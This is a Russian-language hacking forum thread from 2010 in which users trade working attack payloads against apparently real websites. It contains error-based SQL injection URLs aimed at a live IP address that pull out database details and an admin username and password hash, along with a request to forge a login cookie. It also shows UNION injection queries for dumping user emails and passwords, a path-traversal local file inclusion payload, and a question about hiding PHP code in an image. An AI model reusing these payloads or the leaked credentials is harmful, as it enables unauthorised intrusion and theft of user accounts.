ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.10.2010, 04:05
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
[-_-]
Сообщение от None
http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+concat_ws(0x3a,database() ,user(),version())),floor(rand(0)*2))+from+informa tion_schema.tables+group+by+2)bb)
Сообщение от None
Duplicate entry 'bans:bans1@localhost:5.1.40-community1' for key 'group_key'
|
|
|
08.10.2010, 06:16
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Сообщение от ILYAtirtir
ILYAtirtir said:
[-_-]
[-_-]
Цитата:
http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+concat_ws(0x3a,database() ,user(),version())),floor(rand(0)*2))+from+informa tion_schema.tables+group+by+2)bb)
спс
но вот не могу понять почему не выводит nickname i pass при запросе :
Сообщение от None
http://93.84.115.243/bans/ban_details.php?bid=928+and+(select+1+from+(select +count(0),concat((select+,concat_ws(0x3a,username, password)),floor(rand(0)*2))+from+amx_webadmins+gr oup+by+2)bb)
|
|
|
|
08.10.2010, 06:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
2142
Репутация:
6
|
|
username:admin
Сообщение от None
http://93.84.115.243/bans/ban_details.php?bid=(select+1+from+(select+count(0 )%20,concat((select+username+from+amx_webadmins+li mit+0,1),floor(rand(0)*2))+from+amx_webadmins+grou p+by+2+limit+1)a)
password:18a6b0764940adcc543fc2b92e564174
Сообщение от None
http://93.84.115.243/bans/ban_details.php?bid=(select+1+from+(select+count(0 )%20,concat((select+password+from+amx_webadmins+li mit+0,1),floor(rand(0)*2))+from+amx_webadmins+grou p+by+2+limit+1)a)
|
|
|
|
08.10.2010, 16:16
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
boxazbox, спасибо.
Такой вопрос.
допустим логин: 'admin' pass(hash): '18a6b0764940adcc543fc2b92e564174' logcode: 'a0dc927eefd71cce9b70e7ccb066130a'
Читая этот топик увидел такую фразу как : "если не удастся найти пароль по хешу, можно составить куку."
/thread121710-amxbans.html
--
Вопрос: как ее правильно составить эту куку?)
|
|
|
|
08.10.2010, 16:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от GroM88
GroM88 said:
boxazbox
, спасибо.
Такой вопрос.
допустим логин: 'admin' pass(hash): '18a6b0764940adcc543fc2b92e564174' logcode: 'a0dc927eefd71cce9b70e7ccb066130a'
Читая этот топик увидел такую фразу как : "если не удастся найти пароль по хешу, можно составить куку."
/thread121710-amxbans.html
--
Вопрос: как ее правильно составить эту куку?)
зависит от логики скрипта
|
|
|
|
09.10.2010, 03:19
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от durito
durito said:
никто не знает урлы онлайн-сканеров директорий сайта
раньше знал пару, но они не пашут уже
http://scan.0day.in:8080/action/scan
http://defec.ru/scaner/
http://madnet.name/tools/madss/
|
|
|
|
09.10.2010, 16:56
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Есть ли локальный инклуд в этом коде?
И как его использовать?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"modules_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"data/modules/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"template_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"template/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// Определяем модуль
[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]= empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$site[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'start_page'[/COLOR][COLOR="#007700"]] : (string)[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// Запрешённые шаблоны для показа
[/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'main'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'quick_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]modules_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]))
{
include[/COLOR][COLOR="#0000BB"]modules_dir$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
}
else
{
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]) and !isset([/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tpl_view[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$system_error[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]'Непредвиденная ошибка в обработке команды.
Обратитесь к модератору/администратору сайта.'[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
|
|
|
|
09.10.2010, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Byrger
Byrger said:
Есть ли локальный инклуд в этом коде?
И как его использовать?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"modules_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"data/modules/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"template_dir"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"template/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// Определяем модуль
[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]= empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$site[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'start_page'[/COLOR][COLOR="#007700"]] : (string)[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// Запрешённые шаблоны для показа
[/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'main'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'quick_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_error'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]modules_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]))
{
include[/COLOR][COLOR="#0000BB"]modules_dir$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"];
}
else
{
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]) and !isset([/COLOR][COLOR="#0000BB"]$mods[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]template_dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.tpl'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$parse[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tpl_view[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$system_error[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#DD0000"]'Непредвиденная ошибка в обработке команды.
Обратитесь к модератору/администратору сайта.'[/COLOR][COLOR="#007700"];
}
}[/COLOR][/COLOR]
script.php?page=../../../../../../../../../[LFI]%00
|
|
|
|
09.10.2010, 19:03
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Привет всем. Помогите понять плз
Есть скуля
Сообщение от None
http://site.net/products/serial.php?serial_id=-1168+union+select+1,2,3,4,username,6,7,8,9+from+us ers--+
в таблице юзеров нужные колонки
username
password
email
Если выводить username без лимита, то на страницу выводятся все 20к юзернэймов (все что есть в бд)
Но если пытаться вывести так же password или email-то в ответ пустая страница. concat(*) таже фигня, как поотдельности так и вместе обьединял, ничего. username отдельно выводится как угодно,все из базы. Но вместе никак.
И по отдельности password или email тоже не выводятся. Только через лимит или group_concat(*)
Думал мож дело в кодировке, пробовал так
Сообщение от None
AES_DECRYPT(AES_ENCRYPT(concat(username),0x71),0x7 1),6,7,8,9+from+users--+
выводятся.
Сообщение от None
AES_DECRYPT(AES_ENCRYPT(concat(email *или пасс, с конкатом и без*),0x71),0x71),6,7,8,9+from+users--+
невыводятся
Сообщение от None
convert(email,binary),6,7,8,9+from+users--+
тоже некатит
Сообщение от None
convert(email+using+latin1),6,7,8,9+from+users--+
некатит
Сообщение от None
concat_ws(0x3A3a,table_schema,table_name,column_na me),6,7,8,9+from+information_schema.columns--+
Выводит все таблицы и колонки на страницу, как и юзернэйм. А мыло с пассом нет =(
Сообщение от None
group_concat(email,0x3a,password),6,7,8,9+from+use rs--+
выводит и мыло и пасс и поотдельности тоже выводит.
И через limit они выводятся.
Но сами по себе нет.
password,6,7,8,9+from+users--+
Через like выводятся
concat_ws(0x3a,email,password),6,7,8,9+from+users+ where+email+like+'a%'--+
но не хочу весь алфавит перебирать =)
Можно ли как то вывести ВСЕ мыла и пассы. Возможно по какому то общему критерию, который есть в каждой записи...хз. Может скажем в условии можно сделать вывод всех мыл и пассов, у которых колонка id не пустая.
Очень буду благодарен если обьясните. |
|
|
|
09.10.2010, 21:16
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 8
Провел на форуме:
41003
Репутация:
0
|
|
Подскажите пожалуйста как в картинку засунуть свой php-код? Ну мне нужно проинклудить картинку вобщем.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
